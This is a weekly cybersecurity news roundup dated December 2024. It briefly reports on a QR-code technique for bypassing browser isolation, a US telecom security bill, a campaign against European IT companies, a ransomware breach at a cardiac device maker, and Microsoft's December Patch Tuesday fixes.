This Week in Cyber 13th December 2024

Analyst Insight

This week highlights the increased focus by threat actors on mobile devices, whether it be telecommunications systems or devices themselves. QR codes are being used to bypass isolated browsers in a proof-of-concept demonstrated by Mandiant. QR codes have been scrutinised by many security researchers including ourselves in the last year over their inherent trait of not being human readable. Microsoft's December Patch Tuesday brings a wealth of fixes to their products with over 17 critical vulnerabilities being addressed. The troubling trend of healthcare providers and researchers being targeted by threat actors continues with Artivion, a leading manufacturer of cardiac implants, disclosing a breach this week. 

QR Codes Proven To Be Viable Vehicles For Complex Attacks

Readers of Telesoft's Cyber Report may remember 2 months ago, one of our analysts raised concerns around the use of QR codes, questioning whether their convenience was worth the risk. Researchers at Mandiant have proven that the danger from QR codes is more than just phishing and deception, with proof-of-concept methods to bypass 3 types of browser isolations. Browser Isolation is one of the major steps used to protect devices from a variety of threats. Browser Isolation operates separately to the main browser in order to avoid any malicious payloads or executions that may occur, with only the visual appearance of pages being sent back to the browser. QR codes, being visual by nature can be used to obscure command executions and data on the local browser rather than the isolated one.

While this is a far more technical attack chain than simply obscuring the end link, it once again proves that QR codes may need to be taken with a new dose of scrutiny.

Wyden Proposes New Bill to Secure U.S. Telecoms Networks After Major Hack

Following the "Salt Typhoon" breach, Senator Ron Wyden proposed the Secure American Communications Act to strengthen the security of American wireless and phone networks. The bill mandates that current telecom security regulations be enforced by the Federal Communications Commission (FCC). Wyden blasted the FCC for allowing telecom firms to establish their own cybersecurity guidelines, which resulted in significant security breaches. "It was inevitable that foreign hackers would burrow deep into the American communications system the moment the FCC decided to let phone companies write their own cybersecurity rules". "Telecom companies and federal regulators were asleep on the job," Wyden stated. The law seeks to safeguard government communications and restrict the export of personal information belonging to Americans in order to preserve U.S. communications.

European IT Companies targeted by "Operation Digital Eye"

Researchers from SentinelLabs identified a campaign that spanned a 3 week period through June and July they have dubbed "Operation Eagle Eye". The campaign has utilised Microsoft tools such as Azure and Visual Studio Code to mask their activities. Initial access was gained through SQL injections against public facing database servers; from there further exploitation and access was gained. Notably a simply named "code.exe" file, digitally signed by Microsoft and run as a service using the in built Windows Service Wrapper was used via compromised portable copies of Visual Studio Code.

US Medical Device Manufacturer Artivon Hit by Ransomware

Artivion, a leading manufacturer of cardiac implants and devices, disclosed this week that they fell victim to a ransomware attack on the 21st of November. The company specified in an SEC Form 8-K to investors that the attack does not impact any finances or operations and that they will “continue to provide its products and services to customers” with the only disruptions being “some order and shipping processes.” Artivion was forced to take some systems offline following the discovery of the breach, and it's unclear how many files were encrypted or stolen by its attackers. Artivion reassured investors of delivering its products and services to customers without interruption.

December Patch Tuesday: Microsoft Releases Fixes for 72 Security Flaws

This December's Microsoft patch highlights a large number of flaws and fixes to go with them. 17 Critical and 54 Important vulnerabilities have been addressed. One of these vulnerabilities has been acknowledged as having been actively exploited. CVE-2024-49138 is a privilege escalation vulnerability using Windows Common Log File System. The US CISA has added the CVE to their Known Exploited Vulnerabilities (KEV) Catalog. As always, patch your vulnerable systems as per vendor advice.